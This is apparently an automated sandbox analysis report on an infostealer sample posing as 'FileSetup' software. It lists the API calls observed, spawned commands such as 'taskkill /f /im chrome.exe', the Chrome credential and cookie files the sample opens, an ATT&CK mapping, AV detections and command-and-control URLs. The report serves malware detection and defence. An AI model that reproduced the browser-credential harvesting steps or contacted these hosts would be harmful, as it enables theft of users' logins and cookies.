Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0049602F mov eax, dword ptr fs:[00000030h]1_2_0049602F
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h]4_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]4_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]4_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]4_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]4_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h]4_2_10019ED0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004AA130 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__write_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004AA130
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00490470 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00490470
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,4_2_10015354
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,4_2_10015376
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,4_2_10018413
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF461F SetUnhandledExceptionFilter,29_2_00BF461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00BF1C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00BF373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00BF631F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,4_2_1001A0F0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A661B cpuid 1_2_004A661B
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0048E010
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,1_2_004A6688
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,1_2_004A67C3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004A47EC
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004A67FE
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_004A693B
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_004A4E48
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_004990E2
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_004A5099
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: GetLocaleInfoA,4_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,29_2_00BF7189
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,4_2_10019780
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00492AD9 GetSystemTimeAsFileTime,1_2_00492AD9
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable Media1Native API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture1Peripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter2Valid Accounts1Valid Accounts1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Browser Extensions1Access Token Manipulation1Install Root Certificate2NTDSSystem Information Discovery58Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronBootkit1Process Injection11Software Packing1LSA SecretsQuery Registry2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery451VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion13Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection11Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdBootkit1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 345937 Sample: FileSetup-v17.04.41.exe Startdate: 29/01/2021 Architecture: WINDOWS Score: 90 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 100 Uses ping.exe to sleep 2->100 102 3 other signatures 2->102 8 FileSetup-v17.04.41.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 74 84cfba021a5a6662.xyz 104.21.23.16, 49725, 49730, 49731 CLOUDFLARENETUS United States 8->74 68 C:\Users\user\...\6852B33702F6B3BD.exe, PE32 8->68 dropped 70 C:\...\6852B33702F6B3BD.exe:Zone.Identifier, ASCII 8->70 dropped 104 Installs new ROOT certificates 8->104 106 Hides threads from debuggers 8->106 15 6852B33702F6B3BD.exe 26 8->15         started        20 6852B33702F6B3BD.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 76 84cfba021a5a6662.xyz 15->76 78 84CFBA021A5A6662.xyz 15->78 54 C:\Users\user\AppData\...\1611946678493.exe, PE32 15->54 dropped 56 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->56 dropped 58 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->58 dropped 66 7 other files (none is malicious) 15->66 dropped 84 Multi AV Scanner detection for dropped file 15->84 86 Detected unpacking (creates a PE file in dynamic memory) 15->86 88 Machine Learning detection for dropped file 15->88 94 4 other signatures 15->94 26 cmd.exe 15->26         started        29 1611946678493.exe 2 15->29         started        31 ThunderFW.exe 1 15->31         started        80 84cfba021a5a6662.xyz 20->80 60 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->60 dropped 62 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->62 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        82 127.0.0.1 unknown unknown 22->82 92 Uses ping.exe to sleep 22->92 37 PING.EXE 1 22->37         started        40 conhost.exe 22->40         started        64 C:\Users\user\AppData\Local\...\MSI61C2.tmp, PE32 24->64 dropped file9 signatures10 process11 dnsIp12 42 conhost.exe 26->42         started        44 PING.EXE 26->44         started        108 Uses ping.exe to sleep 33->108 46 conhost.exe 33->46         started        48 PING.EXE 1 33->48         started        50 taskkill.exe 1 35->50         started        52 conhost.exe 35->52         started        72 192.168.2.1 unknown unknown 37->72 signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FileSetup-v17.04.41.exe61%VirustotalBrowse
FileSetup-v17.04.41.exe48%ReversingLabsWin32.PUA.KingSoft
FileSetup-v17.04.41.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe48%ReversingLabsWin32.PUA.KingSoft
C:\Users\user\AppData\Local\Temp\MSI61C2.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSI61C2.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
84CFBA021A5A6662.xyz1%VirustotalBrowse
84cfba021a5a6662.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://84cfba021a5a6662.xyz/info_old/g1%VirustotalBrowse
http://84cfba021a5a6662.xyz/info_old/g0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/e1%VirustotalBrowse
http://84cfba021a5a6662.xyz/info_old/e0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/w0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://A5D4CE54CC78B3CA.xyz/0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/r0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/i0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/xet(0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
https://fsfba021a5a6662.xyz/0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/ddd0%Avira URL Cloudsafe
https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/wN0%Avira URL Cloudsafe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/g0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/w&0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/w%0%Avira URL Cloudsafe
http://crl.pki.goog/GTSGIAG3.crl00%Avira URL Cloudsafe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
84CFBA021A5A6662.xyz
104.21.23.16
truefalseunknown
84cfba021a5a6662.xyz
104.21.23.16
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://84cfba021a5a6662.xyz/info_old/gfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/efalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/wfalse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/rfalse
  • Avira URL Cloud: safe
unknown
http://84CFBA021A5A6662.xyz/info_old/dddfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecvAA35.tmp.11.drfalse
    		high
    https://duckduckgo.com/chrome_newtab6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drfalse
      		high
      https://duckduckgo.com/ac/?q=6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drfalse
        		high
        https://www.messenger.com/6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
          		high
          http://www.msn.comecvAA35.tmp.11.drfalse
            		high
            http://www.nirsoft.net1611946678493.exe, 0000000B.00000002.283027571.0000000000198000.00000004.00000010.sdmpfalse
              		high
              https://deff.nelreports.net/api/report?cat=msnecvAA35.tmp.11.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://A5D4CE54CC78B3CA.xyz/6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://twitter.com/ookie:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                		high
                https://twitter.comsec-fetch-dest:6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecvAA35.tmp.11.drfalse
                  		high
                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.pki.goog/gts1o1core0ecvAA35.tmp.11.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://maps.windows.com/windows-app-web-linkecvAA35.tmp.11.drfalse
                    		high
                    http://www.msn.com/?ocid=iehpecvAA35.tmp.11.drfalse
                      		high
                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166ecvAA35.tmp.11.drfalse
                        		high
                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecvAA35.tmp.11.drfalse
                          		high
                          https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnecvAA35.tmp.11.drfalse
                            		high
                            http://crl.pki.goog/GTS1O1core.crl0ecvAA35.tmp.11.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.messenger.com6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                              		high
                              http://www.nirsoft.net/1611946678493.exe, 1611946678493.exe.4.drfalse
                                		high
                                http://forms.real.com/real/realone/download.html?type=rpsp_us6852B33702F6B3BD.exe, 00000004.00000003.304868433.0000000003CBF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://config.i.duba.net/lminstall/%d.json?time=%dFileSetup-v17.04.41.exefalse
                                    		high
                                    http://ocsp.pki.goog/GTSGIAG30ecvAA35.tmp.11.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%26852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                      		high
                                      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssecvAA35.tmp.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpfalse
                                        		high
                                        https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937ecvAA35.tmp.11.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5ecvAA35.tmp.11.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.instagram.com/6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.4.drfalse
                                              		high
                                              http://www.xunlei.com/GETdownload_engine.dll.4.drfalse
                                                		high
                                                http://84cfba021a5a6662.xyz/iFileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvAA35.tmp.11.drfalse
                                                  		high
